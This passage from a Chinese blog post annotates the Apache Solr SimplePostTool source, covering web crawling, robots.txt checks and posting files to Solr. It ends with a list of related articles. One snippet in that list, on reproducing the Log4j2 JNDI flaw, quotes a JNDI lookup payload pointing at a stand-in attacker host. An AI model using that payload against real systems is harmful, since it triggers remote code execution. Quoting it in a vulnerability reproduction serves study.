		//如果URL以/结尾，则删除结尾的/
		if (link.endsWith("/")) {
			link = link.substring(0, link.length() - 1);
		}
		return link;
	}

	/**
	 * 页面抓取
	 * @param level  当前抓取深度
	 * @param out
	 * @return
	 */
	protected int webCrawl(int level, OutputStream out) {
		int numPages = 0;
		LinkedHashSet<URL> stack = (LinkedHashSet<URL>) this.backlog.get(level);
		int rawStackSize = stack.size();
		stack.removeAll(this.visited);
		int stackSize = stack.size();
		LinkedHashSet<URL> subStack = new LinkedHashSet<URL>();
		info(new StringBuilder().append("Entering crawl at level ")
				.append(level).append(" (").append(rawStackSize)
				.append(" links total, ").append(stackSize).append(" new)")
				.toString());
		for (URL u : stack) {
			try {
				//当前URL存入已访问列表，避免同一URL重复抓取
				this.visited.add(u);
				//获取到页面内容PageFetcherResult
				PageFetcherResult result = pageFetcher.readPageFromUrl(u);
				//状态码200表示页面抓取成功
				if (result.httpStatus == 200) {
					u = result.redirectUrl != null ? result.redirectUrl : u;
					//如果有页面重定向，则抓取重定向后的页面内容
					URL postUrl = new URL(appendParam(
							this.solrUrl.toString(),
							new StringBuilder()
									.append("literal.id=")
									.append(URLEncoder.encode(u.toString(),
											"UTF-8"))
									.append("&literal.url=")
									.append(URLEncoder.encode(u.toString(),
											"UTF-8")).toString()));

					boolean success = postData(
							new ByteArrayInputStream(result.content.array(),
									result.content.arrayOffset(),
									result.content.limit()), null, out,
							result.contentType, postUrl);
					if (success) {
						info(new StringBuilder().append("POSTed web resource ")
								.append(u).append(" (depth: ").append(level)
								.append(")").toString());
						Thread.sleep(this.delay * 1000);
						numPages++;

						//如果抓取深度还没超过限制
						if ((this.recursive > level)
								&& (result.contentType.equals("text/html"))) {
							//从抓取的页面中提取出URL
							Set<URL> children = pageFetcher.getLinksFromWebPage(
									u,
									new ByteArrayInputStream(result.content
											.array(), result.content
											.arrayOffset(), result.content
											.limit()), result.contentType,
									postUrl);
							//把提取出来的URL存入stack中
							subStack.addAll(children);
						}
					} else {
						warn(new StringBuilder()
								.append("An error occurred while posting ")
								.append(u).toString());
					}
				} else {
					warn(new StringBuilder().append("The URL ").append(u)
							.append(" returned a HTTP result status of ")
							.append(result.httpStatus).toString());
				}
			} catch (IOException e) {
				warn(new StringBuilder()
						.append("Caught exception when trying to open connection to ")
						.append(u).append(": ").append(e.getMessage())
						.toString());
			} catch (InterruptedException e) {
				throw new RuntimeException();
			}
		}
		if (!subStack.isEmpty()) {
			this.backlog.add(subStack);
			numPages += webCrawl(level + 1, out);
		}
		return numPages;
	}

	public static ByteBuffer inputStreamToByteArray(BAOS bos,InputStream is)
			throws IOException {
		return inputStreamToByteArray(bos,is, 2147483647L);
	}

	/**
	 * 页面输入流转换到输出流，然后输出流将接收到的字节数据存入ByteBuffer字节缓冲区
	 * @param bos
	 * @param is
	 * @param maxSize
	 * @return
	 * @throws IOException
	 */
	public static ByteBuffer inputStreamToByteArray(BAOS bos,InputStream is, long maxSize)
			throws IOException {
		long sz = 0L;
		int next = is.read();
		while (next > -1) {
			if (++sz > maxSize) {
				throw new BufferOverflowException();
			}
			bos.write(next);
			next = is.read();
		}
		bos.flush();
		is.close();
		return bos.getByteBuffer();
	}

	/**
	 * 计算完整的URL,因为页面上的A标签的href属性值可能是相对路径，所以这里需要拼接上baseUrl，你懂的
	 * @param baseUrl 网站根路径
	 * @param link    从A标签属性值上提取出来的值
	 * @return
	 */
	protected String computeFullUrl(URL baseUrl, String link) {
		if ((link == null) || (link.length() == 0)) {
			return null;
		}
		if (!link.startsWith("http")) {
			if (link.startsWith("/")) {
				link = new StringBuilder().append(baseUrl.getProtocol())
						.append("://").append(baseUrl.getAuthority())
						.append(link).toString();
			} else {
				if (link.contains(":")) {
					return null;
				}
				String path = baseUrl.getPath();
				if (!path.endsWith("/")) {
					int sep = path.lastIndexOf("/");
					String file = path.substring(sep + 1);
					if ((file.contains(".")) || (file.contains("?")))
						path = path.substring(0, sep);
				}
				link = new StringBuilder().append(baseUrl.getProtocol())
						.append("://").append(baseUrl.getAuthority())
						.append(path).append("/").append(link).toString();
			}
		}
		link = normalizeUrlEnding(link);
		String l = link.toLowerCase(Locale.ROOT);

		//过滤调图片链接
		if ((l.endsWith(".jpg")) || (l.endsWith(".jpeg"))
				|| (l.endsWith(".png")) || (l.endsWith(".gif"))) {
			return null;
		}
		return link;
	}

	/**
	 * 判断某个文件类型是否在程序支持范围内，支持范围由mimeMap变量定义
	 * @param type
	 * @return
	 */
	protected boolean typeSupported(String type) {
		for (String key : mimeMap.keySet()) {
			if ((((String) mimeMap.get(key)).equals(type))
					&& (this.fileTypes.contains(key))) {
				return true;
			}
		}
		return false;
	}

	/**
	 * 只要输入的是true,on,yes,1都返回true
	 * @param property
	 * @return
	 */
	protected static boolean isOn(String property) {
		return "true,on,yes,1".indexOf(property) > -1;
	}

	/**
	 * 打印警告信息
	 * @param msg
	 */
	static void warn(String msg) {
		System.err.println(new StringBuilder()
				.append("SimplePostTool: WARNING: ").append(msg).toString());
	}

	/**
	 * 打印提示信息
	 * @param msg
	 */
	static void info(String msg) {
		System.out.println(msg);
	}

	/**
	 * 打印比较严重致命性的信息
	 * @param msg
	 */
	static void fatal(String msg) {
		System.err.println(new StringBuilder()
				.append("SimplePostTool: FATAL: ").append(msg).toString());
		System.exit(2);
	}

	/**
	 * 提交索引数据至Solr Admin
	 */
	public void commit() {
		info(new StringBuilder().append("COMMITting Solr index changes to ")
				.append(this.solrUrl).append("...").toString());
		doGet(appendParam(this.solrUrl.toString(), "commit=true"));
	}

	/**
	 * 发送索引优化请求至Solr Admin后台
	 */
	public void optimize() {
		info(new StringBuilder().append("Performing an OPTIMIZE to ")
				.append(this.solrUrl).append("...").toString());
		doGet(appendParam(this.solrUrl.toString(), "optimize=true"));
	}

	/**
	 * 在URL后面追加参数即id=1&mode=files格式
	 * @param url
	 * @param param
	 * @return
	 */
	public static String appendParam(String url, String param) {
		String[] pa = param.split("&");
		for (String p : pa) {
			if (p.trim().length() != 0) {
				String[] kv = p.split("=");
				if (kv.length == 2) {
					url = new StringBuilder().append(url)
							.append(url.indexOf(63) > 0 ? "&" : "?")
							.append(kv[0]).append("=").append(kv[1]).toString();
				} else {
					warn(new StringBuilder().append("Skipping param ")
							.append(p)
							.append(" which is not on form key=value")
							.toString());
				}
			}
		}
		return url;
	}

	public void postFile(File file, OutputStream output, String type) {
		InputStream is = null;
		try {
			URL url = this.solrUrl;
			String suffix = "";
			if (this.auto) {
				if (type == null) {
					type = guessType(file);
				}
				if (type != null) {
					if ((!type.equals("application/xml"))
							&& (!type.equals("text/csv"))
							&& (!type.equals("application/json"))) {
						suffix = "/extract";
						String urlStr = appendUrlPath(this.solrUrl, suffix)
								.toString();
						if (urlStr.indexOf("resource.name") == -1) {
							//往提交URL后面追加resource.name参数即文件的绝对路径
							urlStr = appendParam(
									urlStr,
									new StringBuilder()
											.append("resource.name=")
											.append(URLEncoder.encode(
													file.getAbsolutePath(),
													"UTF-8")).toString());
						}
						if (urlStr.indexOf("literal.id") == -1) {
							//往提交URL后面追加literal.id参数即文件的绝对路径
							urlStr = appendParam(
									urlStr,
									new StringBuilder()
											.append("literal.id=")
											.append(URLEncoder.encode(
													file.getAbsolutePath(),
													"UTF-8")).toString());
						}
						url = new URL(urlStr);
					}
				} else
					//未知的文件类型则直接跳过，仅仅是打印下警告信息
					warn(new StringBuilder().append("Skipping ")
							.append(file.getName())
							.append(". Unsupported file type for auto mode.")
							.toString());

			} else if (type == null) {
				//如果自动猜测文件类型关闭了，而文件类型又为Null，那只好设置为默认值DEFAULT_CONTENT_TYPE
				type = DEFAULT_CONTENT_TYPE;
			}

			info(new StringBuilder()
					.append("POSTing file ")
					.append(file.getName())
					.append(this.auto ? new StringBuilder().append(" (")
							.append(type).append(")").toString() : "")
					.append(" to [base]").append(suffix).toString());
			is = new FileInputStream(file);
			//开始提交文件
			postData(is, Integer.valueOf((int) file.length()), output, type,
					url);
		} catch (IOException e) {
			e.printStackTrace();
			warn(new StringBuilder().append("Can't open/read file: ")
					.append(file).toString());
		} finally {
			try {
				if (is != null) {
					is.close();
				}
			} catch (IOException e) {
				fatal(new StringBuilder()
						.append("IOException while closing file: ").append(e)
						.toString());
			}

		}
	}

	/**
	 * 往请求URL追加内容，
	 * 如http://localhost:8080/solr/core1?param1=value1&param2=value2 追加一个/update后
	 *   http://localhost:8080/solr/core1/update?param1=value1&param2=value2
	 * @param url
	 * @param append
	 * @return
	 * @throws MalformedURLException
	 */
	protected static URL appendUrlPath(URL url, String append)
			throws MalformedURLException {
		return new URL(new StringBuilder()
				.append(url.getProtocol())
				.append("://")
				.append(url.getAuthority())
				.append(url.getPath())
				.append(append)
				.append(url.getQuery() != null ? new StringBuilder()
						.append("?").append(url.getQuery()).toString() : "")
				.toString());
	}

	/**
	 * 根据文件后缀名猜测文件MIME类型
	 * @param file
	 * @return
	 */
	protected static String guessType(File file) {
		String name = file.getName();
		String suffix = name.substring(name.lastIndexOf(".") + 1);
		return (String) mimeMap.get(suffix.toLowerCase(Locale.ROOT));
	}

	/**
	 * 发送get请求
	 * @param url
	 */
	public static void doGet(String url) {
		try {
			doGet(new URL(url));
		} catch (MalformedURLException e) {
			warn(new StringBuilder().append("The specified URL ").append(url)
					.append(" is not a valid URL. Please check").toString());
		}
	}
	/**
	 * 发送get请求
	 * @param url
	 */
	public static void doGet(URL url) {
		try {
			if (mockMode) {
				return;
			}
			HttpURLConnection urlc = (HttpURLConnection) url.openConnection();
			if (url.getUserInfo() != null) {
				String encoding = DatatypeConverter.printBase64Binary(url
						.getUserInfo().getBytes(StandardCharsets.US_ASCII));
				urlc.setRequestProperty("Authorization", new StringBuilder()
						.append("Basic ").append(encoding).toString());
			}
			//开始请求Solr Admin后台
			urlc.connect();
			//验证是否请求成功
			checkResponseCode(urlc);
		} catch (IOException e) {
			warn(new StringBuilder()
					.append("An error occurred posting data to ").append(url)
					.append(". Please check that Solr is running.").toString());
		}
	}

	/**
	 * POST方式提交
	 * @param data
	 * @param length
	 * @param output
	 * @param type
	 * @param url
	 * @return
	 */
	public boolean postData(InputStream data, Integer length,
			OutputStream output, String type, URL url) {
		if (mockMode) {
			return true;
		}
		boolean success = true;
		if (type == null)
			type = DEFAULT_CONTENT_TYPE;
		HttpURLConnection urlc = null;
		try {
			try {
				urlc = (HttpURLConnection) url.openConnection();
				try {
					//设置Http Method为 post
					urlc.setRequestMethod("POST");
				} catch (ProtocolException e) {
					//如果Solr Admin端服务不支持POST请求，则打印异常信息
					fatal(new StringBuilder()
							.append("Shouldn't happen: HttpURLConnection doesn't support POST??")
							.append(e).toString());
				}
				urlc.setDoOutput(true);
				urlc.setDoInput(true);
				urlc.setUseCaches(false);
				urlc.setAllowUserInteraction(false);
				urlc.setRequestProperty("Content-type", type);
				if (url.getUserInfo() != null) {
					String encoding = DatatypeConverter.printBase64Binary(url
							.getUserInfo().getBytes(StandardCharsets.US_ASCII));
					urlc.setRequestProperty(
							"Authorization",
							new StringBuilder().append("Basic ")
									.append(encoding).toString());
				}
				if (null != length)
					urlc.setFixedLengthStreamingMode(length.intValue());
				urlc.connect();
			} catch (IOException e) {
				fatal(new StringBuilder()
						.append("Connection error (is Solr running at ")
						.append(this.solrUrl).append(" ?): ").append(e)
						.toString());
				success = false;
			}
			Throwable localThrowable3;
			try {
				OutputStream out = urlc.getOutputStream();
				localThrowable3 = null;
				try {
					pipe(data, out);
				} catch (Throwable localThrowable1) {
					localThrowable3 = localThrowable1;
					throw localThrowable1;
				} finally {
					if (out != null)
						if (localThrowable3 != null) {
							try {
								out.close();
							} catch (Throwable x2) {
								localThrowable3.addSuppressed(x2);
							}
						} else {
							out.close();
						}
				}
			} catch (IOException e) {
				fatal(new StringBuilder()
						.append("IOException while posting data: ").append(e)
						.toString());
				success = false;
			}
			try {
				success &= checkResponseCode(urlc);
				InputStream in = urlc.getInputStream();
				localThrowable3 = null;
				try {
					pipe(in, output);
				} catch (Throwable localThrowable2) {
					localThrowable3 = localThrowable2;
					throw localThrowable2;
				} finally {
					if (in != null)
						if (localThrowable3 != null)
							try {
								in.close();
							} catch (Throwable x2) {
								localThrowable3.addSuppressed(x2);
							}
						else
							in.close();
				}
			} catch (IOException e) {
				warn(new StringBuilder()
						.append("IOException while reading response: ")
						.append(e).toString());
				success = false;
			}
		} finally {
			if (urlc != null) {
				urlc.disconnect();
			}
		}
		return success;
	}

	/**
	 * 根据响应状态码判断是否提交成功了
	 * @param urlc
	 * @return
	 * @throws IOException
	 */
	private static boolean checkResponseCode(HttpURLConnection urlc)
			throws IOException {
		//响应状态码如果大于等于400，表示请求失败了
		if (urlc.getResponseCode() >= 400) {
			warn(new StringBuilder().append("Solr returned an error #")
					.append(urlc.getResponseCode()).append(" (")
					.append(urlc.getResponseMessage()).append(") for url: ")
					.append(urlc.getURL()).toString());

			Charset charset = StandardCharsets.ISO_8859_1;
			String contentType = urlc.getContentType();

			if (contentType != null) {
				int idx = contentType.toLowerCase(Locale.ROOT).indexOf(
						"charset=");
				if (idx > 0) {
					charset = Charset.forName(contentType.substring(
							idx + "charset=".length()).trim());
				}
			}

			InputStream errStream = urlc.getErrorStream();
			Throwable localThrowable2 = null;
			try {
				if (errStream != null) {
					BufferedReader br = new BufferedReader(
							new InputStreamReader(errStream, charset));
					StringBuilder response = new StringBuilder("Response: ");
					int ch;
					while ((ch = br.read()) != -1) {
						response.append((char) ch);
					}
					warn(response.toString().trim());
				}
			} catch (Throwable localThrowable1) {
				localThrowable2 = localThrowable1;
				throw localThrowable1;
			} finally {
				if (errStream != null)
					if (localThrowable2 != null)
						try {
							errStream.close();
						} catch (Throwable x2) {
							localThrowable2.addSuppressed(x2);
						}
					else
						errStream.close();
			}
			return false;
		}
		return true;
	}

	/**
	 * 字符串转换成字节输入流
	 * @param s
	 * @return
	 */
	public static InputStream stringToStream(String s) {
		return new ByteArrayInputStream(s.getBytes(StandardCharsets.UTF_8));
	}

	/**
	 * 把输入流传输到输出流上
	 * @param source
	 * @param dest
	 * @throws IOException
	 */
	private static void pipe(InputStream source, OutputStream dest)
			throws IOException {
		byte[] buf = new byte[1024];
		int read = 0;
		while ((read = source.read(buf)) >= 0) {
			if (null != dest) {
				dest.write(buf, 0, read);
			}
		}
		if (null != dest) {
			dest.flush();
		}
	}

	/**
	 * 根据传入的fileType构建文件过滤器
	 * @param fileTypes
	 * @return
	 */
	public GlobFileFilter getFileFilterFromFileTypes(String fileTypes) {
		String glob;
		if (fileTypes.equals("*")) {
			glob = ".*";
		} else {
			glob = new StringBuilder().append("^.*\\.(")
					.append(fileTypes.replace(",", "|")).append(")$")
					.toString();
		}
		return new GlobFileFilter(glob, true);
	}

	/**
	 * 根据XPath表达式获取XML节点
	 * @param n
	 * @param xpath
	 * @return
	 * @throws XPathExpressionException
	 */
	public static NodeList getNodesFromXP(Node n, String xpath)
			throws XPathExpressionException {
		XPathFactory factory = XPathFactory.newInstance();
		XPath xp = factory.newXPath();
		XPathExpression expr = xp.compile(xpath);
		return (NodeList) expr.evaluate(n, XPathConstants.NODESET);
	}

	/**
	 * 根据XPath表达式获取XML节点
	 * @param n
	 * @param xpath
	 * @param concatAll  是否包含所有子节点，否则只取第一个
	 * @return
	 * @throws XPathExpressionException
	 */
	public static String getXP(Node n, String xpath, boolean concatAll)
			throws XPathExpressionException {
		NodeList nodes = getNodesFromXP(n, xpath);
		StringBuilder sb = new StringBuilder();
		if (nodes.getLength() > 0) {
			for (int i = 0; i < nodes.getLength(); i++) {
				sb.append(new StringBuilder()
						.append(nodes.item(i).getNodeValue()).append(" ")
						.toString());
				if (!concatAll) {
					break;
				}
			}
			return sb.toString().trim();
		}
		return "";
	}

	/**
	 * 把字节数据转换为Document对象，为XML解析做准备
	 * @param in
	 * @return
	 * @throws SAXException
	 * @throws IOException
	 * @throws ParserConfigurationException
	 */
	public static Document makeDom(byte[] in) throws SAXException, IOException,
			ParserConfigurationException {
		InputStream is = new ByteArrayInputStream(in);
		Document dom = DocumentBuilderFactory.newInstance()
				.newDocumentBuilder().parse(is);
		return dom;
	}

	static {
		DATA_MODES.add("files");
		DATA_MODES.add("args");
		DATA_MODES.add("stdin");
		DATA_MODES.add("web");

		mimeMap = new HashMap<String, String>();
		mimeMap.put("xml", "application/xml");
		mimeMap.put("csv", "text/csv");
		mimeMap.put("json", "application/json");
		mimeMap.put("pdf", "application/pdf");
		mimeMap.put("rtf", "text/rtf");
		mimeMap.put("html", "text/html");
		mimeMap.put("htm", "text/html");
		mimeMap.put("doc", "application/msword");
		mimeMap.put("docx",
				"application/vnd.openxmlformats-officedocument.wordprocessingml.document");
		mimeMap.put("ppt", "application/vnd.ms-powerpoint");
		mimeMap.put("pptx",
				"application/vnd.openxmlformats-officedocument.presentationml.presentation");
		mimeMap.put("xls", "application/vnd.ms-excel");
		mimeMap.put("xlsx",
				"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet");
		mimeMap.put("odt", "application/vnd.oasis.opendocument.text");
		mimeMap.put("ott", "application/vnd.oasis.opendocument.text");
		mimeMap.put("odp", "application/vnd.oasis.opendocument.presentation");
		mimeMap.put("otp", "application/vnd.oasis.opendocument.presentation");
		mimeMap.put("ods", "application/vnd.oasis.opendocument.spreadsheet");
		mimeMap.put("ots", "application/vnd.oasis.opendocument.spreadsheet");
		mimeMap.put("txt", "text/plain");
		mimeMap.put("log", "text/plain");
	}

	public class PageFetcherResult {
		int httpStatus = 200;
		String contentType = "text/html";
		URL redirectUrl = null;
		ByteBuffer content;

		public PageFetcherResult() {
		}
	}

	/**
	 * 页面抓取类
	 * @author Lanxiaowei
	 *
	 */
	class PageFetcher {
		Map<String, List<String>> robotsCache;
		final String DISALLOW = "Disallow:";

		public PageFetcher() {
			this.robotsCache = new HashMap<String, List<String>>();
		}

		/**
		 * 根据指定的URL去抓取页面，页面内容包装在PageFetcherResult对象中
		 * @param u
		 * @return
		 */
		public PageFetcherResult readPageFromUrl(URL u) {
			PageFetcherResult res = new PageFetcherResult();
			try {
				/**
				 * 如果当前URL在roots.txt的禁止爬取列表中，则直接跳过
				 */
				if (isDisallowedByRobots(u)) {
					SimplePostTool
							.warn("The URL "
									+ u
									+ " is disallowed by robots.txt and will not be crawled.");
					res.httpStatus = 403;
					SimplePostTool.this.visited.add(u);
					return res;
				}
				res.httpStatus = 404;
				HttpURLConnection conn = (HttpURLConnection) u.openConnection();
				conn.setRequestProperty("User-Agent",
						"SimplePostTool-crawler/5.1.0 (http://lucene.apache.org/solr/)");
				conn.setRequestProperty("Accept-Encoding", "gzip, deflate");
				conn.connect();
				res.httpStatus = conn.getResponseCode();
				if (!SimplePostTool
						.normalizeUrlEnding(conn.getURL().toString())
						.equals(SimplePostTool.normalizeUrlEnding(u.toString()))) {
					SimplePostTool.info("The URL " + u
							+ " caused a redirect to " + conn.getURL());
					u = conn.getURL();
					res.redirectUrl = u;
					SimplePostTool.this.visited.add(u);
				}
				if (res.httpStatus == 200) {
					String rawContentType = conn.getContentType();
					String type = rawContentType.split(";")[0];
					if (SimplePostTool.this.typeSupported(type)) {
						String encoding = conn.getContentEncoding();
						InputStream is = null;
						if ((encoding != null)
								&& (encoding.equalsIgnoreCase("gzip"))) {
							is = new GZIPInputStream(conn.getInputStream());
						} else {
							if ((encoding != null)
									&& (encoding.equalsIgnoreCase("deflate")))
								is = new InflaterInputStream(
										conn.getInputStream(), new Inflater(
												true));
							else {
								is = conn.getInputStream();
							}
						}
						BAOS bos = new BAOS();
						res.content = SimplePostTool.inputStreamToByteArray(bos,is);
						is.close();
						bos.close();
					} else {
						SimplePostTool
								.warn("Skipping URL with unsupported type "
										+ type);
						res.httpStatus = 415;
					}
				}
			} catch (IOException e) {
				SimplePostTool.warn("IOException when reading page from url "
						+ u + ": " + e.getMessage());
			}
			return res;
		}

		/**
		 * 根据roots.txt信息判断指定URL是否可以抓取
		 * @param url
		 * @return
		 */
		public boolean isDisallowedByRobots(URL url) {
			String host = url.getHost();
			//拼接网站的roots.txt访问地址
			String strRobot = url.getProtocol() + "://" + host + "/robots.txt";
			//先从缓存中获取当前网站的roots信息
			List<String> disallows = (List<String>) this.robotsCache.get(host);
			//若缓存中没有
			if (disallows == null) {
				disallows = new ArrayList<String>();
				try {
					//则根据拼接的roots.txt访问地址去解析获取
					URL urlRobot = new URL(strRobot);
					//解析roots信息
					disallows = parseRobotsTxt(urlRobot.openStream());
				} catch (MalformedURLException e) {
					return true;
				} catch (IOException e) {
				}
			}
			//缓存到 map中
			this.robotsCache.put(host, disallows);
			
			//判断是否存在于roots的禁爬列表中
			String strURL = url.getFile();
			for (String path : disallows) {
				if ((path.equals("/")) || (strURL.indexOf(path) == 0)) {
					return true;
				}
			}
			//return false即表示不是禁爬URL
			return false;
		}

		/**
		 * 根据roots.txt输入流解析roots信息，存入list中，一般是一行一条url
		 * @param is
		 * @return
		 * @throws IOException
		 */
		protected List<String> parseRobotsTxt(InputStream is)
				throws IOException {
			List<String> disallows = new ArrayList<String>();
			BufferedReader r = new BufferedReader(new InputStreamReader(is,
					StandardCharsets.UTF_8));
			String l;
			while ((l = r.readLine()) != null) {
				String[] arr = l.split("#");
				if (arr.length != 0) {
					l = arr[0].trim();
					//我们只关心禁爬URL信息，Disallow不允许的意思即禁爬
					if (l.startsWith("Disallow:")) {
						l = l.substring("Disallow:".length()).trim();
						if (l.length() != 0) {
							disallows.add(l);
						}
					}
				}
			}
			is.close();
			return disallows;
		}

		/**
		 * 从抓取到的页面内容中提取出URL
		 * @param u
		 * @param is
		 * @param type
		 * @param postUrl
		 * @return
		 */
		protected Set<URL> getLinksFromWebPage(URL u, InputStream is,
				String type, URL postUrl) {
			Set<URL> l = new HashSet<URL>();
			URL url = null;
			try {
				ByteArrayOutputStream os = new ByteArrayOutputStream();
				URL extractUrl = new URL(SimplePostTool.appendParam(
						postUrl.toString(), "extractOnly=true"));
				boolean success = SimplePostTool.this.postData(is, null, os,
						type, extractUrl);
				if (success) {
					Document d = SimplePostTool.makeDom(os.toByteArray());
					String innerXml = SimplePostTool.getXP(d,
							"/response/str/text()[1]", false);
					d = SimplePostTool.makeDom(innerXml
							.getBytes(StandardCharsets.UTF_8));
					//这个XPath表达式表示：获取html标签下的body标签下的所有a标签的href属性值
					NodeList links = SimplePostTool.getNodesFromXP(d,
							"/html/body//a/@href");
					for (int i = 0; i < links.getLength(); i++) {
						String link = links.item(i).getTextContent();
						link = SimplePostTool.this.computeFullUrl(u, link);
						if (link != null) {
							url = new URL(link);
							if ((url.getAuthority() != null)
									&& (url.getAuthority().equals(u
											.getAuthority()))) {
								l.add(url);
							}
						}
					}
				}
			} catch (MalformedURLException e) {
				SimplePostTool.warn("Malformed URL " + url);
			} catch (IOException e) {
				SimplePostTool.warn("IOException opening URL " + url + ": "
						+ e.getMessage());
			} catch (Exception e) {
				throw new RuntimeException();
			}
			return l;
		}
	}

	/**
	 * 自定义文件过滤器
	 * @author Lanxiaowei
	 *
	 */
	class GlobFileFilter implements FileFilter {
		private String _pattern;
		private Pattern p;

		/**
		 * isRegex用来表示第一个参数pattern是否为一个正则表达式
		 * @param pattern
		 * @param isRegex
		 */
		public GlobFileFilter(String pattern, boolean isRegex) {
			this._pattern = pattern;
			//如果pattern参数不是一个正则表达式
			if (!isRegex) {
				//不是正则表达式的话，则需要对正则表达式里的特殊字符进行转义，所以这里的处理就不言自明了
				this._pattern = this._pattern.replace("^", "\\^")
						.replace("$", "\\$").replace(".", "\\.")
						.replace("(", "\\(").replace(")", "\\)")
						.replace("+", "\\+").replace("*", ".*")
						.replace("?", ".");
				//经过上一步处理后this._pattern参数就被当作一个普通的文件名了，
				//再在开头加^结尾加$转换成正则表达式
				this._pattern = ("^" + this._pattern + "$");
			}
			try {
				//这里的2即Pattern.CASE_INSENSITIVE即忽略大小写的意思
				this.p = Pattern.compile(this._pattern, 2);
			} catch (PatternSyntaxException e) {
				SimplePostTool.fatal("Invalid type list " + pattern + ". "
						+ e.getDescription());
			}
		}
		/**根据正则表达式匹配结果判断是否返回这个文件*/
		public boolean accept(File file) {
			return this.p.matcher(file.getName()).find();
		}
	}

	/**
	 * 自定义字节输出流
	 * @author Administrator
	 *
	 */
	public static class BAOS extends ByteArrayOutputStream {
		//把输出流存入ByteBuffer字节缓冲区中，因为ByteBuffer比byte[]读写效率要高
		public ByteBuffer getByteBuffer() {
			return ByteBuffer.wrap(this.buf, 0, this.count);
		}
	}
}

看懂了post.jar的源码，有助于你更熟练使用post.jar来进行索引的添加删除等操作，下面截图演示如何在eclipse下运行SimplePostTool类进行索引测试操作，如图：

如果你还有什么问题请加我Ｑ-Q：7-3-6-0-3-1-3-0-5，

或者加裙
一起交流学习！

你可能感兴趣的:(Solr,PostTool)

分布式搜索引擎Elasticsearch——基础敲代码的旺财架构进阶 elasticsearch java 搜索引擎 ES-head
文章目录一、Lucene与Solr与Elasticsearch二、ES核心术语三、ES核心概念四、倒排索引五、ES的安装（centos7）1、下载地址（这里安装linux版本）2、解压压缩包3、修改配置文件(1)修改核心配置文件(2)修改JVM配置文件4、启动ES(1)添加系统用户并授权(2)ES启动(3)修改配置文件(4)再次启动ES六、安装ES-head插件（可视化管理插件）1、使用谷歌市场安
Java高级技术day75：Zookeeper与Dubbo 开源oo柒
一、Zookeeper的介绍1.Zookeeper介绍：顾名思义zookeeper就是动物园管理员，他是用来管hadoop（大象）、Hive(蜜蜂)、pig(小猪)的管理员，ApacheHbase和ApacheSolr的分布式集群都用到了zookeeper；Zookeeper:是一个分布式的、开源的程序协调服务，是hadoop项目下的一个子项目。他提供的主要功能包括：配置管理、名字服务、分布式锁、
Elasticsearch详解es 思静语 elasticsearch elasticsearch 大数据搜索引擎
文章目录概述es架构为什么要使用ElasticSearchElasticSearch的优势使用场景es为什么这么快倒排索引如何保证ES和数据库的数据一致性监听binlog同步双写elasticsearch是如何实现master选举的Elasticsearch与Solr的区别概述ES全称是ElasticSearch，它是一个建立在全文搜索引擎库Lucene基础上的开源搜索和分析引擎。ES它本身具有分
08、全文检索 -- Solr -- 使用 SolrClient 连接 Solr（演示手动配置自定义的SolrClient 并在测试类使用 solrClient 进行添加、查询、删除文档的操作） _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr lucene
目录SolrClientSolrClient的功能SolrClient这个API包含如下常用方法：SolrClient方法的说明：SpringBootStarterDataSolr的不足手动配置自定义的SolrClientSolrClient代码演示配置自定义的SolrClient1、创建一个SpringBoot项目，添加依赖2、SolrAutoConfiguration解析3、手动配置自定义的S
java 商城全文搜索_利用solr实现商品的搜索功能闲侃数码 java 商城全文搜索
后期补充：为什么要用solr服务，为什么要用luncence？问题提出：当我们访问购物网站的时候，我们可以根据我们随意所想的内容输入关键字就可以查询出相关的内容，这是怎么做到呢？这些随意的数据不可能是根据数据库的字段查询的，那是怎么查询出来的呢，为什么千奇百怪的关键字都可以查询出来呢？答案就是全文检索工具的实现，luncence采用了词元匹配和切分词。举个例子：北京天安门------luncenc
solr7集群 springboot_springboot 集成solr 骑lv上高速 solr7集群 springboot
一、版本介绍：jdk1.8tomcat8springboot2.1.3RELEASE(这里有坑,详见下文)solr7.4.0(没有选择最新的版本,是因为项目的boot版本是2.1.3,其对应的solr-solrj.jar版本是7.4.0，为避免出现不可预料不可抗拒不可解决的问题，谨慎选用与之一样版本)二、solr服务器搭建下载1.tomcat8的下载不赘述；2.solr下载：进入solr官网，找历
09、全文检索 -- Solr -- SpringBoot 整合 Spring Data Solr （生成DAO组件和实现自定义查询方法） _L_J_H_ #全文检索（Solr 和 Elasticsearch）spring 全文检索 solr
目录SpringBoot整合SpringDataSolrSpringDataSolr的功能（生成DAO组件）：SpringDataSolr大致包括如下几方面功能：@Query查询（属于半自动）代码演示：1、演示通过dao组件来保存文档1、实体类指定索引库2、修改日志级别3、创建Dao接口4、先删除所有文档5、创建测试类6、演示结果2、根据title_cn字段是否包含关键字来查询3、查询指定价格范围
vulhub中Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）余生有个小酒馆 vulhub漏洞复现 apache log4j 安全
ApacheLog4j2是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入，执行任意代码。1.服务启动后，访问`http://your-ip:8983`即可查看到ApacheSolr的后台页面。2.`$
solr —— 1 全文检索Solr8.0第一部分苏打饼干没加心 solr
solr，毕设啊，快被写完吧1solr介绍什么是solrLucene与Solr与ES为什么要用slor2HelloWorld2.1项目安装部署2.2项目安装配置创建核心创建document(表)添加文件查询数据3solr后台管理页面详解控制面板5全文检索千万级别数据实战，全面剖析架构设计，大数据瓶颈突破6数据库导入索引BV1Dt411G7eF1solr介绍什么是solrsolr简化了程序员的操作L
（三十七）大数据实战——Solr服务的部署安装厉害哥哥吖大数据大数据 solr
前言Solr是一个基于ApacheLucene的开源搜索平台，它提供了强大的全文搜索、分布式搜索和数据分析功能。Solr可以用于构建高性能的搜索应用程序，支持从海量数据中快速检索和分析信息。Solr使用倒排索引和先进的搜索算法，可实现快速而准确的全文搜索。Solr可以在多个服务器上进行水平扩展，实现分布式搜索和负载均衡。Solr支持复杂的过滤、排序和范围查询，使您可以根据各种条件对搜索结果进行精确
ElasticSearch VS. Solr VS. Sphinx：最好的开源搜索引擎比较 chenxiyy3773 大数据人工智能数据库
